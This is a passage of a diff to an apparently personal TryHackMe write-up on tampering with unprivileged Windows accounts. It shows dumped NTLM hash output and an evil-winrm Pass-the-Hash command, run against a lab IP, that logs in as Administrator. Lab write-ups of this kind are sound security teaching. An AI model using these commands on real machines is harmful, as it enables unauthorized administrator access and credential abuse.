JonmarCorpuz/Writeups/TryHackMe Module Task Writeups/Tampering With Unprivileged Accounts.md

 thmuser4:1013:aad3b435b51404eeaad3b435b51404ee:8767940d669d0eb618c15c11952472e5:::
 [*] Cleaning up...
 ```
-17. `evil-winrm -i {TARGET IP} -u Administrator -H {PASSWORD HASH}` to perform a Pass-the-Hash (PtH) attack on the compromised machine to log in as the Administrator using their password hash, which ended up working
+17. `evil-winrm -i {TARGET IP} -u Administrator -H {PASSWORD HASH}` from our Linux attack machine to perform a Pass-the-Hash (PtH) attack on the compromised machine to log in as the Administrator using their password hash, which ended up working
 ```Bash
 root@ip-10-10-72-227:~# evil-winrm -i 10.10.41.253 -u Administrator -H f3118544a831e728781d780cfdb9c1fa